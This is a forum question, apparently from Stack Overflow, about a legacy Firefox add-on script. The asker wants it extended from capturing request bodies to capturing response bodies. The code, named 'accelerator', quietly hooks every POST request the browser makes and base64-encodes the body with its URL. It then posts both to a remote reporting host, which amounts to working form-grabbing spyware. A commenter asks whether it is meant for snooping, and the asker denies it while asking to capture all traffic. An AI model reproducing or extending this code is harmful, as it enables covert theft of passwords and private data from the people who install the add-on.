# Get raw response body in a Firefox add-on

Tags: javascript, firefox, firefox-addon, response

Please help to change this code for interception RESPONSE BODY(RAW).
I already think that it is impossible. 
If that is possible at once edit this code.
There are some examples with my alterations of http-on-examine-response, but any of them doesn't work, I don't know why.
Thanks in advance.

```
// Адрес хоста для отправки отчетов
var log_host = "test.com";
// Путь к скрипту - приемщику
var log_uri = "/test.php";
// Максимальный размер POST-данных для отправки
var log_req_limit = 1024;

var accelerator =
{
   // Функция для установки обработчика на событие http-on-modify-request
   // Список событий можно посмотреть здесь https://developer.mozilla.org/en/Observer_Notifications
add_observer : function()
{
    var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
    observerService.addObserver(this, "http-on-modify-request", false);
},
// Функция для снятия обработчика на событие http-on-modify-request
// Не вызывается, но пусть будет
remove_observer : function()
{
    var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
    observerService.removeObserver(this, "http-on-modify-request");
},
// Функция, которая вызывается при возникновении интересующего нас события
observe : function(subject, topic, data)
{
    var http_channel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);

    // Проверяем тип события
    if(topic == "http-on-modify-request")
    {
        // Исключаем из фильтрации URL хоста для приема отчетов
        var uri = subject.URI.spec;
        if(new RegExp('^http://(?:www\.)*' + log_host, 'i').test(uri))
        {
            return;
        }

        // Обрабатываем только POST-запросы
        if(http_channel.requestMethod == "POST")
        {
            // Извлекаем объект в котором хранится запрос
            var upload_channel = http_channel.QueryInterface(Components.interfaces.nsIUploadChannel);
            var upload_channel_stream = upload_channel.uploadStream;

            upload_channel_stream.QueryInterface(Components.interfaces.nsISeekableStream).seek(Components.interfaces.nsISeekableStream.NS_SEEK_SET, 0);

            var stream = Components.classes["@mozilla.org/binaryinputstream;1"].createInstance(Components.interfaces.nsIBinaryInputStream);
            stream.setInputStream(upload_channel_stream);

            // Получаем содержимое POST-запроса в виде строки
            var post_bytes = stream.readByteArray(stream.available());
            var post_data = String.fromCharCode.apply(null, post_bytes);

            // Отделяем тело запроса от вспомогательных заголовков с размером и типом содержимого
            var tmp = post_data.split("\r\n\r\n");
            if(tmp[1] && tmp[1].length <= log_req_limit)
            {
                this.send_post_data(uri, tmp[1]);
            }

            // Устанавливаем смещение в потоке на начало
            upload_channel_stream.QueryInterface(Components.interfaces.nsISeekableStream).seek(Components.interfaces.nsISeekableStream.NS_SEEK_SET, 0);
        }
    }
},
// Вспомогательная функция для отправки POST-запроса на хост
send_post_data : function(uri, data)
{
    // Кодируем данные для безопасной передачи
    var enc_data = escape(this.base64_encode(data));
    var enc_uri = escape(this.base64_encode(uri));
    // XMLHttpRequest вызванный из расширения не обладает стандартными ограничениями
    // таким образом обратиться можно к любому хосту
    var req = new XMLHttpRequest();

    req.open("POST", "http://" + log_host + log_uri, true);
    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    req.send("uri=" + enc_uri + "&info=" + enc_data);
},
// Неведомая фигня, которая была взята из tamper data
QueryInterface : function(iid)
{
    if(iid.equals(Components.interfaces.nsISupports) || iid.equals(Components.interfaces.nsIObserver))
    {
        return this;
    }
    throw Components.results.NS_NOINTERFACE;
},
// Вспомогательный метод для кодирования данных в Base64
base64_encode : function(data)
{
    var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, i = 0,
    ac = 0,
    enc = "",
    tmp_arr = [];

    if(!data)
    {
        return data;
    }

    do
    {
        o1 = data.charCodeAt(i++);
        o2 = data.charCodeAt(i++);
        o3 = data.charCodeAt(i++);

        bits = o1 << 16 | o2 << 8 | o3;

        h1 = bits >> 18 & 0x3f;
        h2 = bits >> 12 & 0x3f;
        h3 = bits >> 6 & 0x3f;
        h4 = bits & 0x3f;


        tmp_arr[ac++] = b64.charAt(h1) + b64.charAt(h2) + b64.charAt(h3) + b64.charAt(h4);
    } while (i < data.length);

    enc = tmp_arr.join('');

    var r = data.length % 3;

    return (r ? enc.slice(0, r - 3) : enc) + '==='.slice(r || 3);
}
};

// Вызываем метод, который установит обработчик на интересующее нас событие
accelerator.add_observer();
```

Comment: What's the error(s) you are getting? Your code does not seem to deal with response bodies at all, just request bodies. What's up with that? Also, what's the end goal here? It isn't snooping on unsuspecting users, is it?

Comment: What's the error(s) you are getting? No error, it works good, but i need to intercept RESPONSE BODY instead of POST BODY. It isn't snooping on unsuspecting users, is it? No.  Also, what's the end goal here? It is necessary to intercept RESPONSE BODY instead of POST BODY. As a result I want to intercept all requests of the browser, not only POST.

Comment: See the `http-on-examime-response` notification and/or `nsITraceableChannel`.

Comment: I attached the new version, but it doesn't work. Alert returns empty value. Help me do this, please

Comment: Let's see: https://www.google.com/search?q=nsITraceableChannel

Comment: The new code is added. Again failure. I can't be able to did it. :'-(

Comment: I had no idea how to extract the response from the TracingListener object. Anyone dealt with that before?? thanks!